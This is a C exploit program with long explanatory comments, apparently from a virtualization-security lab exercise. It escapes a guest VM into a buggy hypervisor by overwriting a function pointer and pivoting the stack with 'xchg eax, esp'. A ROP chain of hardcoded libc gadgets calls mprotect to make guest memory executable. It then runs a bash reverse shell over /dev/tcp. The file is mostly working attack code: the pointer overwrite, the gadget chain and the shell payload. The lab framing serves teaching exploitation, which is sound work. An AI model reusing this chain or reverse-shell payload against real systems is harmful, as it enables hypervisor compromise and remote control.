extern void outb(unsigned short a, unsigned char b);
extern void outl(unsigned short a, unsigned int b);

/* this time the hypervisor has not mapped guestmem with PROT_EXEC.  This means
 * that the NX bit will be set on those pages and the hypervisor will not be
 * able to jump into revshell.
 *
 * The counterattack is always the same: code reuse. We may use the hd bug to
 * inject a ROP chain and overwrite a return address on the stack. This should
 * be easy in kvm-2, since ASLR is disabled and stack addresses are
 * predictable. However, we want to try something different: we let 'foo_ptr'
 * point to a "stack pivot". Stack pivots are gadgets the modify the stack
 * pointer. They can be used, e.g, to move the stack to a more convenient
 * attacker-controlled memory region when a stack-overwrite vulnerability is
 * not large enough to contain the ROP chain.  In this case we want to use a
 * stack-pivot for another reason: start the ROP chain execution from a CALL or
 * JMP instruction. In particular, we will use this pivot gadged, which can be
 * usually found in the libc:
 *
 * 	xchg eax, esp; ret
 *
 * If we call or jmp to this gadget, esp will be loaded with eax and then a ret
 * instruction will be executed on the new stack. If we can control eax, we can
 * set it to an address where we have stored a ROP chain (this address can be
 * in our guest memory, so there is no need to inject the chain itself into the
 * hypervisor memory). By studying the foo() function, we can see that eax will
 * contain &guestmem[a], with a controlled by us. Therefore, we just need to
 * prepare the ROP chain somewhere in the guest program, say in a buffer
 * 'ropchain', overwrite 'foo_ptr' with the address of the stack pivot, and
 * then call 
 *
 * 	outb(0x70, ropchain)
 *
 * this will set eax to &guestmem[ropchain] and then call the pivot.
 *
 * Note that the gadget manipulates the 32b registers, even if the program is
 * 64b. This means that the high part of rsp will be set to zero. This is not a
 * problem in this case, since guestmem is well below 4GiB.
 *
 * What should we put into the ROP chain? Clearly, we can just call system()
 * with the reverse shell command. We want to try something different, however,
 * which is more useful in general: we want to call
 *
 * 	mprotect(guestmem, GUESTMEMSZ, PROT_EXEC|PROT_READ|PROT_WRITE)
 *
 * In this way we recreate the situation of kvm-1, where we can redirect the
 * hypervisor to any function defined in the guest. For this to work, however,
 * the ROP chain needs to safely return into the guest after the call to
 * mprotect(), so that we can continue with the exploit.  The pivot gadget
 * stored the previous stack pointer into eax, so we can try to restore it with
 * another stack pivot, then resume the normal execution. There is a difficulty
 * in 64b systems, though: we lost the high part of rsp during the xchg. The
 * difficulty is easily overcome if ASLR is disabled: the high part is constant
 * (0x7fff).
 */

unsigned long const libc = 0x7ffff79aa000;
unsigned long const pivot = libc + 0x0000000000034f4a;
unsigned long const mprotect = libc + 0x00000000001138e0;
unsigned long const system = libc + 0x00000000000503c0;

unsigned long const foo_ptr = 0x0000000001407000;
unsigned long const guestmem = 0x0000000000407000;

// useful gadgets
unsigned long const mov_rax_Prdi68 = libc + 0x000000000008fe64;		// mov rax, [rdi+0x68]
unsigned long const mov_Prdi8_rax  = libc + 0x000000000008de5a;		// mov [rdi+8], rax
unsigned long const xchg_eax_esp = libc + 0x0000000000034f4a;		// xchg eax, esp
unsigned long const pop_rdi = libc + 0x000000000014a803;		// pop rdi
unsigned long const pop_rsi = libc + 0x000000000002ac3f;		// pop rsi
unsigned long const pop_rdx_add_rsp38 = libc + 0x000000000010f900;	// pop rdx; add rsp, 0x38
unsigned long const pop_rsp = libc + 0x000000000003418a;		// pop rsp
unsigned long const or_rax_rsi = libc + 0x0000000000118ff5;		// or rax, rsi

unsigned long ropchain[50] = {
};

typedef int (*system_p)(const char *);
void revshell()
{
	system_p sys = (system_p)system;

	(*sys)("/bin/bash -c 'sh -i >& /dev/tcp/localhost/10000 <&1 &'");
}


int main()
{
	char buf[512];
	unsigned long *rop = ropchain, *saved_rsp;
	// overwrite foo_ptr in the vmm with the pivot
	*(unsigned long*)&buf[512-8] = pivot;
	outl(0x40, 0);
	outl(0x44, (unsigned long)buf);
	outl(0x48, 2);
	outl(0x44, foo_ptr - guestmem - (512-8));
	outl(0x48, 1);

	// rop chain: we come here after the 'xchg eax, esp', so
	// now 'eax' contains the lower part of the old 'rsp'.
	// 
	// we first restore the full old 'rsp' and save it for later
	*rop++ = pop_rsi;
	*rop++ = 0x7fff00000000;
	*rop++ = or_rax_rsi;
	*rop++ = pop_rdi;
	saved_rsp = rop;
	*rop++ = 0; // placeolder, we will update it below
	*rop++ = mov_Prdi8_rax;	// write the restored old rsp into memory
	// now we can call mprotect
	*rop++ = pop_rdi;
	*rop++ = guestmem;
	*rop++ = pop_rsi;
        *rop++ = 0x1000000;
	*rop++ = pop_rdx_add_rsp38;
        *rop++ = 0x7; 	// PROT_EXEC|PROT_READ/PROT_WRITE
	// we need to pad the stack since the 'pop rdx' gadged also adds to 'rsp'
	rop += 0x38/sizeof(unsigned long);
	*rop++ = mprotect;
	// now we reinstall the old stack and resume normale execution.
	//
	// We cannot use the 'xcgh' stack pivot, since we also need to set
	// the high part of 'rsp'. Instead, we use
	//
	// 	pop rsp; ret
	//
	// this will load 'rsp' from the next stack line. The 'mov [rdi+8], rax'
	// gadgets called earlier in the ROP chain will write the old rsp value
	// in the next stack line.
	*rop++ = pop_rsp;
	// update the placeholder above with the address of the next stack line
	*saved_rsp = guestmem + (unsigned long)rop - 8;
	*rop++ = 0; // this will be overwritten with the value of the old rsp

	// trigger *foo_ptr a first time
	outl(0x70, (unsigned long)ropchain);

	// now guestmem is executable for the hypervisor and we can
	// continue with the same attack as for kvm-1
	*(unsigned long*)&buf[512-8] = guestmem + (unsigned long)revshell;
	outl(0x40, 0);
	outl(0x44, (unsigned long)buf);
	outl(0x48, 2);
	outl(0x44, foo_ptr - guestmem - (512-8));
	outl(0x48, 1);

	// trigger *foo_ptr
	outl(0x70, (unsigned long)ropchain);
}
